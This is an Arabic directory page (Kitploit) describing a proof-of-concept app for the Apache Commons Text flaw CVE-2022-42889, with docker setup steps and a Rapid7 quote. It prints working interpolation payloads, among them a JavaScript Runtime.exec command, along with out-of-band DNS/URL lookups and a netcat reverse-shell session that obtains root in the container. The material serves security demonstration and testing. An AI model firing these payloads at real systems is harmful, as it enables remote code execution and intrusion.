Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2022-42889-POC — تطبيق بسيط يوضح كيفية استغلال ثغرة CVE-2022-42889 | Kitploit
أدوات/GitHubGitHub/korteke/cve-2022-42889-poc
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالتعلم والتعليمتطوير الحمولات
GitHubkorteke/cve-2022-42889-poc

CVE-2022-42889-POC

تطبيق بسيط يوضح كيفية استغلال ثغرة CVE-2022-42889

عرض المستودع
1171منذ 3 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2022-42889-POC

تطبيق تجريبي بسيط يوضح كيفية استغلال ثغرة CVE-2022-42889.
يستخدم خدمات OOB (خارج النطاق) لإظهار بادئات dns و url.

JavaDocs لـ commons-text interpolation commons-text JavaDocs

أمثلة على الاستيفاء

  • script:javascript ("${script:javascript:java.lang.Runtime.getRuntime().exec('touch /tmp/blop')}")
  • dns ("${dns:address|HOST}")
  • url ("${url:UTF-8:http://HOST")

اقتباس من Rapid7

تمت مقارنة الثغرة بـ Log4Shell لأنها ثغرة على مستوى مكتبة مفتوحة المصدر ومن المحتمل أن تؤثر على مجموعة واسعة من تطبيقات البرامج التي تستخدم الكائن ذي الصلة.
ومع ذلك، يشير التحليل الأولي إلى أن هذه المقارنة سيئة. طبيعة الثغرة تعني أنه على عكس Log4Shell، سيكون من النادر أن يستخدم التطبيق المكون الضعيف من Commons Text لمعالجة مدخلات غير موثوقة قد تكون ضارة.

المتطلبات الأساسية

  • docker
  • java
  • maven

يمكن تخطي Java و maven إذا قام المرء بسحب الصورة من Docker Hub

الاستخدام

بناء التطبيق

root@kitploit:~
mvn clean package

بناء صورة docker

root@kitploit:~
docker build -t cve-2022-42889-poc .

تشغيل صورة docker

root@kitploit:~
docker run --rm -p 8081:8081 -t cve-2022-42889-poc

الوصول إلى التطبيق واتباع التعليمات

root@kitploit:~
open http://localhost:8081

تحقق من أن الثغرة تنشئ ملفًا جديدًا في الدليل /tmp/ (/tmp/blop)

root@kitploit:~
➜  ~ docker exec -ti cve-2022-42889-poc /bin/ls /tmp

blop		 tomcat-docbase.8081.12439436974042217796
hsperfdata_root  tomcat.8081.2549096106233509364
➜  ~

الغلاف العكسي. قم بتشغيل "nc" على جهازك المحلي

root@kitploit:~
➜  ~ nc -lv 4242
root@7cfcd6a39a61:/# whoami && uname -a
whoami && uname -a
root
Linux 7cfcd6a39a61 5.10.76-linuxkit #1 SMP Mon Nov 8 10:21:19 UTC 2021 x86_64 GNU/Linux
root@7cfcd6a39a61:/#

واجهة المستخدم

إثبات التفاعل الشبكي. تم الاختبار مع client-interactsh المحلي.

مزيد من المعلومات

  • NIST NVD
  • Rapid 7
تنزيل الأداة